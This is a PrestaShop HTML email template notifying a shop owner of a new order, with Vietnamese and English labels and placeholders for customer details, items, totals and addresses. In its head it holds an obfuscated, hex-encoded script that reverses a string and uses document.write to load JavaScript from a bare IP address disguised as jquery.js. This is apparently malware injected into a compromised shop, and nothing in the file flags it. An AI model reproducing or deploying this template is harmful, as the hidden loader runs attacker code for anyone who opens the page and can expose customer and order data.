<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
		<title>Message from {shop_name}</title>
		
		
		<style>	@media only screen and (max-width: 300px){ 
				body {
					width:218px !important;
					margin:auto !important;
				}
				.table {width:195px !important;margin:auto !important;}
				.logo, .titleblock, .linkbelow, .box, .footer, .space_footer{width:auto !important;display: block !important;}		
				span.title{font-size:20px !important;line-height: 23px !important}
				span.subtitle{font-size: 14px !important;line-height: 18px !important;padding-top:10px !important;display:block !important;}		
				td.box p{font-size: 12px !important;font-weight: bold !important;}
				.table-recap table, .table-recap thead, .table-recap tbody, .table-recap th, .table-recap td, .table-recap tr { 
					display: block !important; 
				}
				.table-recap{width: 200px!important;}
				.table-recap tr td, .conf_body td{text-align:center !important;}	
				.address{display: block !important;margin-bottom: 10px !important;}
				.space_address{display: none !important;}	
			}
	@media only screen and (min-width: 301px) and (max-width: 500px) { 
				body {width:308px!important;margin:auto!important;}
				.table {width:285px!important;margin:auto!important;}	
				.logo, .titleblock, .linkbelow, .box, .footer, .space_footer{width:auto!important;display: block!important;}	
				.table-recap table, .table-recap thead, .table-recap tbody, .table-recap th, .table-recap td, .table-recap tr { 
					display: block !important; 
				}
				.table-recap{width: 295px !important;}
				.table-recap tr td, .conf_body td{text-align:center !important;}
				
			}
	@media only screen and (min-width: 501px) and (max-width: 768px) {
				body {width:478px!important;margin:auto!important;}
				.table {width:450px!important;margin:auto!important;}	
				.logo, .titleblock, .linkbelow, .box, .footer, .space_footer{width:auto!important;display: block!important;}			
			}
	@media only screen and (max-device-width: 480px) { 
				body {width:308px!important;margin:auto!important;}
				.table {width:285px;margin:auto!important;}	
				.logo, .titleblock, .linkbelow, .box, .footer, .space_footer{width:auto!important;display: block!important;}
				
				.table-recap{width: 295px!important;}
				.table-recap tr td, .conf_body td{text-align:center!important;}	
				.address{display: block !important;margin-bottom: 10px !important;}
				.space_address{display: none !important;}	
			}
</style>

	<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>
	<body style="-webkit-text-size-adjust:none;background-color:#fff;width:650px;font-family:Open-sans, sans-serif;color:#555454;font-size:13px;line-height:18px;margin:auto">
		<table class="table table-mail" style="width:100%;margin-top:10px;-moz-box-shadow:0 0 5px #afafaf;-webkit-box-shadow:0 0 5px #afafaf;-o-box-shadow:0 0 5px #afafaf;box-shadow:0 0 5px #afafaf;filter:progid:DXImageTransform.Microsoft.Shadow(color=#afafaf,Direction=134,Strength=5)">
			<tr>
				<td class="space" style="width:20px;padding:7px 0">&nbsp;</td>
				<td align="center" style="padding:7px 0">
					<table class="table" bgcolor="#ffffff" style="width:100%">
						<tr>
							<td align="center" class="logo" style="border-bottom:4px solid #333333;padding:7px 0">
								<a title="{shop_name}" href="{shop_url}" style="color:#337ff1">
									<img src="{shop_logo}" alt="{shop_name}" />
								</a>
							</td>
						</tr>

<tr>
	<td align="center" class="titleblock" style="padding:7px 0">
		<font size="2" face="Open-sans, sans-serif" color="#555454">
			<span class="title" style="font-weight:500;font-size:28px;text-transform:uppercase;line-height:33px">Congratulations!</span>
		</font>
	</td>
</tr>
<tr>
	<td class="linkbelow" style="padding:7px 0">
		<font size="2" face="Open-sans, sans-serif" color="#555454">
			<span>A new order was placed on {shop_name} by the following customer: {firstname} {lastname} ({email})</span>
		</font>
	</td>
</tr>
<tr>
	<td class="space_footer" style="padding:0!important">&nbsp;</td>
</tr>
<tr>
	<td class="box" colspan="3" style="border:1px solid #D6D4D4;background-color:#f8f8f8;padding:7px 0">
		<table class="table" style="width:100%">
			<tr>
				<td width="10" style="padding:7px 0">&nbsp;</td>
				<td style="padding:7px 0">
					<font size="2" face="Open-sans, sans-serif" color="#555454">
						<p data-html-only="1" style="border-bottom:1px solid #D6D4D4;margin:3px 0 7px;text-transform:uppercase;font-weight:500;font-size:18px;padding-bottom:10px">
							Order details						</p>
						<span style="color:#777">
							<span style="color:#333"><strong>Order:</strong></span> {order_name} Placed on {date}<br /><br />
							<span style="color:#333"><strong>Payment:</strong></span> {payment}
						</span>
					</font>
				</td>
				<td width="10" style="padding:7px 0">&nbsp;</td>
			</tr>
		</table>
	</td>
</tr>
<tr>
	<td style="padding:7px 0">
		<font size="2" face="Open-sans, sans-serif" color="#555454">
			<table class="table table-recap" bgcolor="#ffffff" style="width:100%;border-collapse:collapse"><!-- Title -->
				<thead>
					<tr>
						<th style="border:1px solid #D6D4D4;background-color:#fbfbfb;font-family:Arial;color:#333;font-size:13px;padding:10px">Mẫu</th>
						<th style="border:1px solid #D6D4D4;background-color:#fbfbfb;font-family:Arial;color:#333;font-size:13px;padding:10px">Sản phẩm</th>
						<th style="border:1px solid #D6D4D4;background-color:#fbfbfb;font-family:Arial;color:#333;font-size:13px;padding:10px">Đơn giá</th>
						<th style="border:1px solid #D6D4D4;background-color:#fbfbfb;font-family:Arial;color:#333;font-size:13px;padding:10px">Số lượng</th>
						<th style="border:1px solid #D6D4D4;background-color:#fbfbfb;font-family:Arial;color:#333;font-size:13px;padding:10px">Tổng giá</th>
					</tr>
				</thead>
				<tbody>
					<tr>
						<td colspan="5" style="border:1px solid #D6D4D4;color:#777;padding:7px 0">
							&nbsp;&nbsp;{items}
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>Sản phẩm</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" align="right" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											{total_products}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>Giảm giá</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											{total_discounts}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>Gift-wrapping</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											{total_wrapping}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>Vận chuyển</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											{total_shipping}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>Total Tax paid</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											{total_tax_paid}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
					<tr class="conf_body">
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" style="color:#333;padding:0">
										<font size="2" face="Open-sans, sans-serif" color="#555454">
											<strong>total paid</strong>
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#f8f8f8" colspan="4" style="border:1px solid #D6D4D4;color:#333;padding:7px 0">
							<table class="table" style="width:100%;border-collapse:collapse">
								<tr>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
									<td align="right" class="total_amount" style="color:#333;padding:0;font-size:21px;font-weight:500;font-family:Open-sans, sans-serif">
										<font size="4" face="Open-sans, sans-serif" color="#555454">
											{total_paid}
										</font>
									</td>
									<td width="10" style="color:#333;padding:0">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</tbody>
			</table>
		</font>
	</td>
</tr>
<tr>
	<td class="box" colspan="3" style="border:1px solid #D6D4D4;background-color:#f8f8f8;padding:7px 0">
		<table class="table" style="width:100%">
			<tr>
				<td width="10" style="padding:7px 0">&nbsp;</td>
				<td style="padding:7px 0">
					<font size="2" face="Open-sans, sans-serif" color="#555454">
						<p data-html-only="1" style="border-bottom:1px solid #D6D4D4;margin:3px 0 7px;text-transform:uppercase;font-weight:500;font-size:18px;padding-bottom:10px">
							Công ty vận chuyển						</p>
						<span style="color:#777">
							{carrier}
						</span>
					</font>
				</td>
				<td width="10" style="padding:7px 0">&nbsp;</td>
			</tr>
		</table>
	</td>
</tr>
<tr>
	<td class="space_footer" style="padding:0!important">&nbsp;</td>
</tr>
<tr>
	<td style="padding:7px 0">
		<table class="table" style="width:100%">
			<tr>
				<td class="box address" width="310" style="border:1px solid #D6D4D4;background-color:#f8f8f8;padding:7px 0">
					<table class="table" style="width:100%">
						<tr>
							<td width="10" style="padding:7px 0">&nbsp;</td>
							<td style="padding:7px 0">
								<font size="2" face="Open-sans, sans-serif" color="#555454">
									<p data-html-only="1" style="border-bottom:1px solid #D6D4D4;margin:3px 0 7px;text-transform:uppercase;font-weight:500;font-size:18px;padding-bottom:10px">
										Địa chỉ nhận hàng									</p>
									<span style="color:#777">
										{delivery_block_html}
									</span>
								</font>
							</td>
							<td width="10" style="padding:7px 0">&nbsp;</td>
						</tr>
					</table>
				</td>
				<td width="20" class="space_address" style="padding:7px 0">&nbsp;</td>
				<td class="box address" width="310" style="border:1px solid #D6D4D4;background-color:#f8f8f8;padding:7px 0">
					<table class="table" style="width:100%">
						<tr>
							<td width="10" style="padding:7px 0">&nbsp;</td>
							<td style="padding:7px 0">
								<font size="2" face="Open-sans, sans-serif" color="#555454">
									<p data-html-only="1" style="border-bottom:1px solid #D6D4D4;margin:3px 0 7px;text-transform:uppercase;font-weight:500;font-size:18px;padding-bottom:10px">
										Billing address									</p>
									<span style="color:#777">
										{invoice_block_html}
									</span>
								</font>
							</td>
							<td width="10" style="padding:7px 0">&nbsp;</td>
						</tr>
					</table>
				</td>
			</tr>
		</table>
	</td>
</tr>
<tr>
	<td class="space_footer" style="padding:0!important">&nbsp;</td>
</tr>
<tr>
	<td class="box" colspan="3" style="border:1px solid #D6D4D4;background-color:#f8f8f8;padding:7px 0">
		<table class="table" style="width:100%">
			<tr>
				<td width="10" style="padding:7px 0">&nbsp;</td>
				<td style="padding:7px 0">
					<font size="2" face="Open-sans, sans-serif" color="#555454">
						<p data-html-only="1" style="border-bottom:1px solid #D6D4D4;margin:3px 0 7px;text-transform:uppercase;font-weight:500;font-size:18px;padding-bottom:10px">
							Customer message:						</p>
						<span style="color:#777">
							{message}
						</span>
					</font>
				</td>
				<td width="10" style="padding:7px 0">&nbsp;</td>
			</tr>
		</table>
	</td>
</tr>

						<tr>
							<td class="space_footer" style="padding:0!important">&nbsp;</td>
						</tr>
						<tr>
							<td class="footer" style="border-top:4px solid #333333;padding:7px 0">
								<span><a href="{shop_url}" style="color:#337ff1">{shop_name}</a> powered by <a href="http://www.prestashop.com/" style="color:#337ff1">PrestaShop&trade;</a></span>
							</td>
						</tr>
					</table>
				</td>
				<td class="space" style="width:20px;padding:7px 0">&nbsp;</td>
			</tr>
		</table>
	</body>
</html>